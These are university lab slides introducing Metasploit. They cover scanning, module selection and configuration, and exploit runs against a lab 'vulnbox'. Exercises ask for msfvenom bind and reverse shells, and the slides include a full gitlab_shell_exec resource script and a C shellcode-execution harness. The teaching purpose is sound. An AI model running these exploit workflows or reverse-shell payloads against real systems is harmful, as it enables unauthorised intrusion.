Introduction to Metasploit
Stefano Cristalli
November 29, 2018
Laboratorio di Sicurezza e Reti, Università degli Studi di Milano
Table of contents
1. Basic commands in the Metasploit console
2. DEMO: exploiting Heartbleed
3. Exercises
4. DEMO: creating a simple trojan
5. Exercises
Basic commands in the Metasploit console
Discovery
Command db_nmap. Like standard nmap, but interfaced with Metasploit's database: discovered hosts and services are stored and can be listed later with hosts and services.
  db_nmap -v -sV 192.168.19.128
  -v   verbose output
  -sV  tries to determine service/version info
Exploit search
Once we know which service to attack, it is time to search for exploits. Commands search and use.
  msf > search gitlab
  msf > use exploit/multi/http/gitlab_shell_exec
Exploit configuration
Before executing the exploit, we must configure its options. Examples:
  set RHOST 192.168.19.128
  set RPORT 8080
(Recent Metasploit versions name the target option RHOSTS; the console used in these slides takes RHOST.)
Commands info and show options give us information on the exploit and on its options. It is also a good idea to see what the exploit actually does by reading its code, with the command edit.
Exploit test and execution
We can perform a check of the vulnerability with the command check:
  msf > check
The check method is not implemented by every module, and where it is it may do no more than compare a banner, so read its implementation before trusting a "vulnerable" or "safe" verdict.
If we want to actually run the exploit, the command is run (exploit is a synonym):
  msf > run
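The same sequence of console commands, collected into a Metasploit resource script so the whole workflow can be replayed with msfconsole -q -r gitlab.rc. This is an added example, not material from the slides: the target address, port and module are the ones used above, while the workspace name and LHOST are assumptions. Recent Metasploit versions name the target option RHOSTS (the console on these slides used RHOST), and run -j backgrounds the exploit as a job so that sessions -l can list whatever session it opened.

```text
# gitlab.rc: replay of the discovery -> search -> configure -> check -> run workflow.
# Added example; assumes attacker address 192.168.19.1 and a workspace named vulnbox.
workspace -a vulnbox
db_nmap -v -sV 192.168.19.128
services
search gitlab
use exploit/multi/http/gitlab_shell_exec
info
show options
# older consoles (as on the slides): set RHOST 192.168.19.128
set RHOSTS 192.168.19.128
set RPORT 8080
set LHOST 192.168.19.1
check
run -j
sessions -l
```

Lines starting with # are comments in a resource script; everything else is typed into the console exactly as shown on the slides, so the script is also a record of what was done against the target.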
DEMO: exploiting Heartbleed
Exercises
1. Scan vulnbox for services. Which ones can you identify?
2. Try to exploit the running services. Can you find a working exploit?
3. The Apache server we have already analyzed runs a CGI script at /cgi-bin/hello.sh. It is just a hello world, so the script itself is not vulnerable. Maybe the underlying program is a bit... old?
DEMO: creating a simple trojan
Exercises
1. Analyze /home/user/vuln/vuln.c on vulnbox. What does the program do?
2. Exploit the program. Spawn a shell by generating a payload with msfvenom.
3. A local shell isn't enough. Produce and test shellcodes for bind and reverse remote shells.
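Before wiring a payload into the overflow in vuln.c, it pays to confirm that the bytes msfvenom produced actually execute on the target. The harness below is an added example (not from the slides and not part of Metasploit): it copies raw shellcode into an anonymous mapping, flips the page to read+execute, and calls it as a function. The embedded buffer is a constructed placeholder that just returns 42, so the file runs as-is; replace it with the unsigned char buf[] that msfvenom -p linux/x64/shell_reverse_tcp LHOST=... LPORT=... -f c prints (the array name is the same) and start a listener first, for example with exploit/multi/handler. A real shell payload never returns from fn(): it execve()s /bin/sh and replaces the process image.

```c
/* Shellcode test harness (added example, not from the slides).
 * Build: cc -o sctest sctest.c ; run: ./sctest
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

#ifndef MAP_ANONYMOUS            /* strict -std=c11 hides it on glibc */
#define MAP_ANONYMOUS 0x20       /* Linux value on x86-64 and AArch64 */
#endif

#if defined(__x86_64__)
/* Constructed placeholder, NOT msfvenom output:  mov eax, 42 ; ret */
static const unsigned char buf[] = "\xb8\x2a\x00\x00\x00\xc3";
#elif defined(__aarch64__)
/* Constructed placeholder, NOT msfvenom output:  mov w0, #42 ; ret */
static const unsigned char buf[] = "\x40\x05\x80\x52\xc0\x03\x5f\xd6";
#else
#error "add a placeholder for this architecture"
#endif

/* Copy `len` bytes into a fresh anonymous mapping and make it executable.
 * Writing first and switching to R-X afterwards avoids an RWX page.
 * Returns NULL on failure. */
static void *load_shellcode(const unsigned char *code, size_t len)
{
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return NULL;
    memcpy(mem, code, len);
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return NULL;
    }
    /* Needed on architectures with separate I/D caches (e.g. AArch64). */
    __builtin___clear_cache((char *)mem, (char *)mem + len);
    return mem;
}

/* Run `code` as if it were `int f(void)` and return what it returns,
 * or -1 if the mapping could not be set up. */
int run_shellcode(const unsigned char *code, size_t len)
{
    void *mem = load_shellcode(code, len);
    if (mem == NULL)
        return -1;
    int (*fn)(void);
    memcpy(&fn, &mem, sizeof fn);   /* data -> function pointer, no cast warning */
    int ret = fn();
    munmap(mem, len);
    return ret;
}

/* Entry point for the embedded buffer; sizeof buf - 1 drops the string NUL. */
int run_placeholder(void)
{
    return run_shellcode(buf, sizeof buf - 1);
}

int main(void)
{
    printf("shellcode returned %d\n", run_placeholder());
    return 0;
}
```

If the harness segfaults with a real payload, the usual causes are a payload built for the wrong architecture (check -a and --platform in msfvenom) or bad characters removed with -b that the encoder could not avoid; the same checks apply once the bytes are moved into the overflow in vuln.c.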